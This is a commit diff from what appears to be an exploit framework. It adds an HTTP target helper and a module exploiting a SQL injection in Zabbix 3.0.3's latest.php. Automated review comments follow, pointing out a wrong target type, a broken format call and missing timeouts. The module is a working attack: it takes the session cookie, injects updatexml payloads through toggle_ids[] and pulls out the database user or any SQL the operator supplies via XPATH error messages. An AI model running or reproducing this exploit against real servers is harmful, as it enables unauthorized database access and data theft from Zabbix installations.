
Commit 069f02d

committed
feat(module): add suppoort for http target
add register_http_target add zabbix latest sqli
1 parent 94f5ef7 commit 069f02d


3 files changed

+85
-0
lines changed


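--- a/lib/BaseExploit.py
+++ b/lib/BaseExploit.py
@@ -41,6 +41,13 @@ def register_tcp_target(self, port_value=None, timeout_value=10):
 ExploitOption(name="TIMEOUT", required=True, description="Connection timeout", value=timeout_value)
 ])
 
+def register_http_target(self, timeout_value=10):
+self.target_type = "tcp"
+self.register_options([
+ExploitOption(name="URL", required=True, description="The url to be tested"),
+ExploitOption(name="TIMEOUT", required=True, description="Connection timeout", value=timeout_value),
+])
+
 def update_info(self, info):
 for name in info:
 if name in self.info_fields: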
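Review bot: `register_http_target()` sets `self.target_type = "tcp"`, which looks like a copy-paste leftover from the TCP registration helper; anything that branches on `target_type` could not tell a URL-based module from a host/port one. If a distinct type is intended, use `self.target_type = "http"`. How `target_type` is read is not visible in this hunk, so confirm against its consumers. The new method also has no docstring; a one-line `"""Register the URL and TIMEOUT options for an HTTP target."""` would match what the body does.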

modules/exploits/http/zabbix/__init__.py

Whitespace-only changes.
@@ -0,0 +1,78 @@
1+
import re
2+
import requests
3+
from lib.BaseExploit import BaseExploit
4+
from lib.ExploitOption import ExploitOption
5+
6+
7+
class Exploit(BaseExploit):
8+
def __init__(self):
9+
super(Exploit, self).__init__()
10+
self.update_info({
11+
"name": "zabbix latest.php sqli",
12+
"description": "zabbix 3.0.3 latest.php sql injection",
13+
"author": ["unknown"],
14+
"references": [
15+
"http://www.openwall.com/lists/oss-security/2017/01/12/4",
16+
"https://support.zabbix.com/browse/ZBX-11023",
17+
"http://www.debian.org/security/2017/dsa-3802",
18+
"http://www.securityfocus.com/bid/95423",
19+
],
20+
"disclosure_date": "2017-01-12",
21+
"service_name": "zabbix",
22+
"service_version": "3.0.3",
23+
})
24+
self.register_http_target()
25+
self.register_options([
26+
ExploitOption(
27+
name="SQL",
28+
required=True,
29+
description="The SQL statement you want to execute",
30+
value="updatexml(0,concat(0xa,user()),0)"
31+
)
32+
])
33+
34+
def check(self):
35+
url = self.options.get_option("URL")
36+
try:
37+
session = requests.session()
38+
response = session.get(url)
39+
zbx_sessionid = response.cookies.get("zbx_sessionid")
40+
sessionid = zbx_sessionid[-16:]
41+
check_response = session.get("{url}/latest.php?output=ajax&sid="
42+
"{sessionid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,"
43+
"concat(0xa,password(123)),0)".format(url=url, sessionid=sessionid))
44+
if "23AE809DDACAF96AF0FD78ED04B6A2" in check_response.text:
45+
self.results.success("URL:{} has the vulnerability".format(url))
46+
else:
47+
self.results.failure("URL:{} does not have this vulnerability".format(url))
48+
except TypeError:
49+
self.results.failure("URL:{} Maybe not zabbix? not found zbx_sessionid".format(url))
50+
except Exception as e:
51+
self.results.failure("URL:{} does not have this vulnerability, error:{}", format(url, str(e)))
52+
return self.results
53+
54+
def exploit(self):
55+
url = self.options.get_option("URL")
56+
sql = self.options.get_option("SQL")
57+
try:
58+
session = requests.session()
59+
response = session.get(url)
60+
zbx_sessionid = response.cookies.get("zbx_sessionid")
61+
sessionid = zbx_sessionid[-16:]
62+
exploit_response = session.get(
63+
"{url}/latest.php?output=ajax&sid={sessionid}&favobj=toggle&toggle_open_state=1&toggle_ids[]={sql}".format(
64+
url=url,
65+
sessionid=sessionid,
66+
sql=sql,
67+
))
68+
exploit_result_text = re.search(
69+
r"\[XPATH syntax error: '</li><li>(.*?)'\]</li></ul>",
70+
exploit_response.text
71+
).group(1)
72+
self.results.success(message="Exploit result: {}".format(exploit_result_text))
73+
except TypeError:
74+
self.results.failure("URL:{} Maybe not zabbix? not found zbx_sessionid".format(url))
75+
except Exception as e:
76+
self.results.failure("URL:{} does not have this vulnerability, error:{}", format(url, str(e)))
77+
finally:
78+
return self.results
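Review bot: Both generic `except Exception as e` handlers, in `check()` and in `exploit()`, pass `format(url, str(e))` after a comma where `.format(` was meant, so the built-in `format()` receives the exception text as a format spec and will usually raise `ValueError` inside the handler instead of recording the failure. In `exploit()` the `finally: return self.results` then discards that second error silently, while in `check()` it propagates to the caller. Both lines should read `self.results.failure("URL:{} does not have this vulnerability, error:{}".format(url, str(e)))`. Separately, the TIMEOUT option registered by `register_http_target()` is never read in this file, and the `session.get(...)` calls have no `timeout=`, so a non-responding host can block the run indefinitely. Read it with `self.options.get_option("TIMEOUT")` and pass it to each request, assuming that option yields a number.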
